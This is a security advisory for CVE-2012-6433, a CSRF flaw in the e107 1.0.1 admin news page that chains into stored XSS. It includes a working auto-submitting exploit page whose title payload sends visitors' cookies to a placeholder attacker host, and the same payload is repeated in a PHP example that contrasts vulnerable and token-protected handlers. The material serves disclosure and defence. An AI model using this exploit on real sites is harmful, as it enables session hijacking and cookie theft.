Release date:
Updated on:
Affected Systems:
E107 e107 1.0.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57092
CVE (CAN) ID: CVE-2012-6433
e107 is a content management system written in PHP.
e107 1.0.1 (other versions may also be affected) does not protect e107_admin/newspost.php against cross-site request forgery. An attacker who lures a logged-in administrator to a page under the attacker's control can make the administrator's browser submit a forged POST request to the create action, publishing a news item with attacker-chosen content. Because the news_title parameter is not filtered, that request can carry JavaScript, turning the CSRF into a stored cross-site scripting attack that runs in the browser of anyone who views the item.
<* Source: Joshua Renault
Link: http://www.exploit-db.com/exploits/23828/
http://xforce.iss.net/xforce/xfdb/80903
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedure (method) may be harmful and is intended solely for security research and teaching. Use it at your own risk!
Exploit:
<html>
<!-- Attacker-hosted page. The victim must be logged in to the e107 admin area
     so that the browser attaches the admin session cookie to the forged request. -->
<body onload="document.formCSRF.submit();">
  <!-- Auto-submits a "create news" POST to newspost.php; no anti-CSRF token is required -->
  <form method="POST" name="formCSRF" action="http://[site]/e107_admin/newspost.php?create">
    <input type="hidden" name="cat_id" value="1"/>
    <!-- Payload: JavaScript stored in the news title, exfiltrating document.cookie to the attacker -->
    <input type="hidden" name="news_title" value="<script>location.href='http://[evil_site]/cookiemonster.php?cookie='+document.cookie;</script>"/>
    <input type="hidden" name="news_summary" value=""/>
    <input type="hidden" name="data" value=""/>
    <input type="hidden" name="news" value=""/>
    <input type="hidden" name="sizeselect" value=""/>
    <input type="hidden" name="preimageselect" value=""/>
    <input type="hidden" name="news_extended" value=""/>
    <input type="hidden" name="extended" value=""/>
    <input type="hidden" name="sizeselect" value=""/>
    <input type="hidden" name="preimageselect" value=""/>
    <input type="hidden" name="file_userfile[]" value=""/>
    <input type="hidden" name="uploadtype[]" value="resize"/>
    <input type="hidden" name="resize_value" value="100"/>
    <input type="hidden" name="news_allow_comments" value="0"/>
    <input type="hidden" name="news_rendertype" value="0"/>
    <input type="hidden" name="news_start" value=""/>
    <input type="hidden" name="news_end" value=""/>
    <input type="hidden" name="news_datestamp" value=""/>
    <input type="hidden" name="news_userclass[0]" value="1"/>
    <input type="hidden" name="news_author" value="1"/>
    <!-- The submit button's name/value, so the handler treats this as a real form submission -->
    <input type="hidden" name="submit_news" value="Post news to database"/>
    <input type="hidden" name="news_id" value=""/>
  </form>
</body>
</html>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
E107
----
The vendor has released a patch for this issue. Download it from the vendor's homepage:
http://e107plugins.co.uk/
Until the patch is applied, administrators should log out of the admin area before browsing other sites, since the forged request only succeeds while a valid admin session cookie is present in the browser.
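The forged request above works for two reasons: newspost.php accepts any POST that arrives with the administrator's session cookie, and the news_title value is stored and rendered without encoding. The following PHP is an added example written for this page; it is not e107 code and not the vendor's patch. It places a minimal vulnerable "create news" handler beside a hardened one that requires a per-session anti-CSRF token (compared with hash_equals) and HTML-encodes the title on output. All function names, the csrf_token session key and the $store callback are hypothetical, and the forged input is constructed to mirror the PoC.

```php
<?php
// Added example, not e107 code. Minimal "create news" handlers showing the two
// defects the exploit relies on (no anti-CSRF token, news_title rendered raw)
// beside hardened equivalents. Function and session-key names are hypothetical.

declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_token';   // hypothetical session key

// --- Vulnerable pattern (what the PoC exploits) -----------------------------
// Any POST carrying the admin's cookies is accepted, and the title is echoed
// back verbatim, so the injected <script> runs in every viewer's browser.
function vulnerable_create_news(array $post, callable $store): string
{
    $title = $post['news_title'] ?? '';
    $store(['title' => $title]);          // stored as-is
    return "<h2>$title</h2>";             // rendered as-is: stored XSS
}

// --- Hardened pattern -------------------------------------------------------
// 1. Issue a random per-session token and embed it in every state-changing form.
function csrf_token(array &$session): string
{
    if (empty($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

function csrf_hidden_field(array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '"/>';
}

// 2. Reject any POST whose token does not match the session copy. hash_equals()
//    compares in constant time so the token cannot be recovered byte by byte.
function csrf_check(array $session, array $post): bool
{
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// 3. Encode user-controlled data on output. The attacker's page cannot read the
//    admin's token (same-origin policy), so its auto-submitted form fails step 2;
//    and even a stored payload is now inert text when rendered.
function hardened_create_news(array &$session, array $post, callable $store): string
{
    if (!csrf_check($session, $post)) {
        // A real handler would answer HTTP 403 here.
        return 'Request rejected: missing or invalid CSRF token';
    }
    $title = (string)($post['news_title'] ?? '');
    $store(['title' => $title]);
    return '<h2>' . htmlspecialchars($title, ENT_QUOTES, 'UTF-8') . '</h2>';
}

// --- Demonstration with a constructed forged request -----------------------
$session = [];
$store   = function (array $row): void { /* stand-in for the database insert */ };

// The hidden inputs the attacker's page submits (constructed to mirror the PoC).
$forged = [
    'cat_id'      => '1',
    'news_title'  => "<script>location.href='http://[evil_site]/cookiemonster.php?cookie='+document.cookie;</script>",
    'submit_news' => 'Post news to database',
];

echo vulnerable_create_news($forged, $store), "\n";          // <script> tag survives
echo hardened_create_news($session, $forged, $store), "\n";  // rejected: no token

// A legitimate submission from the real admin form carries the token.
echo csrf_hidden_field($session), "\n";                      // what the admin form must contain
$legit = $forged + ['csrf_token' => csrf_token($session)];
echo hardened_create_news($session, $legit, $store), "\n";   // &lt;script&gt;... rendered as text
```

Two details matter in practice: the token must be bound to the session (a fixed or guessable value gives no protection), and the check must apply to every state-changing action in the admin area, not only to newspost.php, since a forged request to any unprotected endpoint reaches it with the same cookies.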